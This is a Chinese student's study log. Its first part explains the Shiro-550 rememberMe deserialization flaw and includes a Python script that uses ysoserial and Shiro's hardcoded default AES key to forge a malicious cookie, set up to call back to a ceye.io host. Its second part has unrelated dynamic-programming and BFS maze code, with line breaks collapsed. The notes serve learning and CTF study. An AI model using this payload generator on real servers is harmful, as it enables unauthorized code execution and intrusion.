原本计划的web不是这个,但是b站上一个大佬讲web做到了连我都能听懂,不趁热打铁学一学记一记就怕忘记了
指路:Shiro反序列化漏洞(一)-shiro550流程分析_哔哩哔哩_bilibili
khttps://www.zhihu.com/question/486555909
学模板先看看结构和功能:
shiro是一个java开源的安全框架
功能(可以利用身份认证和rememberme):
Authentication:身份认证/登录,验证用户是不是拥有相应的身份Authorization:授权,即权限验证,验证某个已认证的用户是否拥有某个权限;即判断用 户是否能进行什么操作,如:验证某个
用户是否拥有某个角色。或者细粒度的验证某个用户对某个资源是否具有某个权限Session Manager:会话管理,即用户登录后就是一次会话,在没有退出之前,它的所有信息都在会话中;会话可以是普通 JavaSE环境,也可以是 Web 环境的Cryptography:加密,保护数据的安全性,如密码加密存储到数据库,而不是明文存储Caching:缓存,比如用户登录后,其用户信息、拥有的角色/权限不必每次去查,这样可以提高效率Run As:允许一个用户假装为另一个用户(如果他们允许)的身份进行访问Remember Me:记住我,这个是非常常见的功能,即一次登录后,下次再来的话不用登录了
身份验证、访问授权、数据加密,具体是怎么实现的:
1.cookie有保存信息(认证能利用吗,怎么处理cookie)
16年shiro-550反序列化漏洞
CookieRememberMeManager:功能,有个序列化操作,getCookie,base64
【之前只会做那种简单的利用isAdmin,shiro这里的功能是个isRememberme,但是Cookie有东西,有加密的做题关键,而不仅仅是我之前遇到的改true】
(找调用),解码之后convertoPrincipal【认证,知道了原理:解密,反序列化】操作
导致漏洞原因:固定的key来加密(bb:有些只一个key的对称加密也想试试能不能做)
payload:使用AES加密,很多安全反固化设备无法识别
暂时到这里,web题wp里的python我得多看看(周日欢迎提问)
import base64
import uuid
import subprocess
from Crypto.Cipher import AESdef rememberme(command):# popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'URLDNS', command], stdout=subprocess.PIPE)popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'URLDNS', command],stdout=subprocess.PIPE)# popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)BS = AES.block_sizepad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key = "kPH+bIxk5D2deZiIxcaaaA=="mode = AES.MODE_CBCiv = uuid.uuid4().bytesencryptor = AES.new(base64.b64decode(key), mode, iv)file_body = pad(popen.stdout.read())base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertextif __name__ == '__main__':# payload = encode_rememberme('127.0.0.1:12345')# payload = rememberme('calc.exe')payload = rememberme('http://xxxx.ceye.io')with open("./payload.cookie", "w") as fpw:print("rememberMe={}".format(payload.decode()))res = "rememberMe={}".format(payload.decode())fpw.write(res)
------------------------------------------------我是分界线——————————————————————
原谅我,知道现阶段大多数时候都用不上一些密码还是算法,可是一看到就真的很想把她吃掉,at last,还是至少想学完它【日志看前面就好了,后面只是自己乱搞的】
算法我就把main函数省了哈
迷宫的动态规划第一周日志提到:
动态规划:1.填充边界2.二选一(上、左)
class Solution {
public:int minPathSum(vector<vector<int> >& matrix) {int row = matrix.size(), col = matrix[0].size(); for (int i = 0; i < row; i ++) {for (int j = 0; j < col; j ++) {if (i == 0 && j != 0) { // 数组第一行matrix[0][j] += matrix[0][j - 1];} else if (j == 0 && i != 0) { // 数组第一列matrix[i][0] += matrix[i - 1][0]; } else if (i > 0 && j > 0) {// 两种方式取最小的matrix[i][j] += min(matrix[i - 1][j], matrix[i][j - 1]);}}}return matrix[row - 1][col - 1];}
};Dijkstra算法(单源带权最短路径)
脚本丢这里(现在的我只能看懂,但自己从头写还是困难了)
①初始化数组【记录距离dist[];选set[未填充];记录前驱path[]】
②找:min(每次找距离最短的节点)③更新:加入新节点后的最短距离
#include<iostream>
#include<string>
#include<queue>
#include<stack>
#include<cstdio>
using namespace std;
int maze[1000][1000];
int mark[1000][1000];struct Offsets
{int dx,dy;string dir;Offsets(int x=-1, int y=-1, string d=""):dx(x),dy(y),dir(d) {}
};
Offsets guide[4]= {{0,-1,"W"},{0,1,"E"},{1,0,"S"},{-1,0,"N"}};//x.y是方向对应坐标的变化
int sx,sy;
int ex,ey;struct PosInfo
{int px,py;PosInfo(int x=0,int y=0):px(x),py(y) {}
};
PosInfo pre[1000][1000]= {0,0};
int SeekShortesPath()
{PosInfo inf(sx,sy);//Queue<PosInfo> q;queue<PosInfo> q;//q.EnQueue(inf);//将起点位置入队q.push(inf);int nx,ny;mark[sx][sy]=1;//标记起点位置已经访问过while(!q.empty()){//q.DeQueue(inf);//队头元素出队inf=q.front();q.pop();PosInfo temp=inf;//int ix=inf.px;//int jy=inf.py;for(int i=0; i<4; i++) // 四个方向扩展(搜索)查看队头元素的四个方向{nx=inf.px+guide[i].dx;ny=inf.py+guide[i].dy;//pre[nx][ny].px=ix;//pre[nx][ny].py=jy;//pre[nx][ny]=(ix,jy);//ix,ij是nx,ny的上一个位置if(maze[nx][ny]==0||mark[nx][ny]==1)continue;//cout<<nx<<ny<<endl;pre[nx][ny]=temp;//cout<<pre[nx][ny].px<<pre[nx][ny].py;if(maze[nx][ny]==4){ex=nx;ey=ny;return 1;}//q.EnQueue(PosInfo(nx,ny));q.push(PosInfo(nx,ny));mark[nx][ny]=1;//将可走的位置入队并标记}}return 0;
}
void PrintPath(int row,int column)
{PosInfo temp;stack<PosInfo> s;temp.px=ex;temp.py=ey;while(temp.px!=row||temp.py!=column){s.push(temp);temp=pre[temp.px][temp.py];}
s.push(temp);while(!s.empty()){temp=s.top();cout<<temp.px<<" "<<temp.py<<" "<<endl;s.pop();}cout<<endl;
}
int main()
{int a,b;cin>>a>>b;for(int i=0; i<a; i++){for(int j=0; j<b; j++)cin>>maze[i][j];}for(int i=0;i<a;i++){for(int j=0;j<b;j++)if(maze[i][j]==3){sx=i;sy=j;}}SeekShortesPath();PrintPath(sx,sy);
